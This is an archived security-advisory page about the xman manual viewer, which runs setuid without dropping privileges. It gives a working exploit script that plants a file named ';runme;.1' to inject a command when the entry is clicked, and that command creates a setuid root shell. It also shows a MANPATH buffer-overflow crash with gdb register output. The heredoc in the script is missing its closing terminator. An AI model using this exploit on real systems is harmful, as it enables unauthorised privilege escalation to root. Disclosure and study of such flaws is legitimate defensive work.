Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Unix :: General :: xman.htm

Xman suid exploit






    'Vde79' found following.   xman doesn't drop privileges  anywheres
    in  the  program,  but   does  support  suid  installation.    So,
    exploiting  via  a  system  call  is  much  easier than the buffer
    overflow in MANPATH, mentioned  in some earlier advisories.   Here
    is an example of such an exploitation possibility:

    # example of xman exploitation. xman
    # supports privileges.  but, never
    # drops them.
    # Vade79 -> ->
    mkdir -p ~/xmantest/man1
    cd ~/xmantest/man1
    touch ';runme;.1'
    cat << EOF >~/xmantest/runme
    cp /bin/sh ~/xmansh
    chown `id -u` ~/xmansh
    chmod 4755 ~/xmansh
    chmod 755 ~/xmantest/runme
    echo "click the ';runme;' selection," \
    "exit.  then, check for ~/xmansh."
    xman -bothshown -notopbox
    rm -rf ~/xmantest
    'KF'added     following.         xman      from      at      least
     X11R6-contrib-3.3.2-3.i386.rpm suffers from a classic overflow.

    [root@linux lib]# ls -al `which xman`
    -rwxr-sr-x    1 root     man         41076 Jun 17  1998
    [root@linux lib]# xman
    [root@linux lib]# export MANPATH=`perl -e 'print "A" x 7000'`
    [root@linux lib]# xman
    Xman Error: Could not allocate memory for manual sections.
    [root@linux lib]# export MANPATH=`perl -e 'print "A" x 70000'`
    [root@linux lib]# xman
    Segmentation fault
    [root@linux lib]# gdb xman
    GNU gdb 5.0mdk-11mdk Linux-Mandrake 8.0
    (gdb) run
    Starting program: /usr/X11R6/bin/xman
    0x4022fb66 in getenv () from /lib/
    (gdb) bt
    #0  0x4022fb66 in getenv () from /lib/
    #1  0x0804bc47 in _start ()
    #2  0x41414141 in ?? ()
    Cannot access memory at address 0x41414141
    (gdb) info registers
    eax            0xbffee784       -1073813628
    ecx            0x804fb29        134544169
    edx            0x805414c        134562124
    ebx            0x40328f2c       1077055276
    esp            0xbffec6fc       0xbffec6fc
    ebp            0xbffec714       0xbffec714
    esi            0x6      6
    edi            0x41414141       1094795585
    eip            0x4022fb66       0x4022fb66


    Nothing yet.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH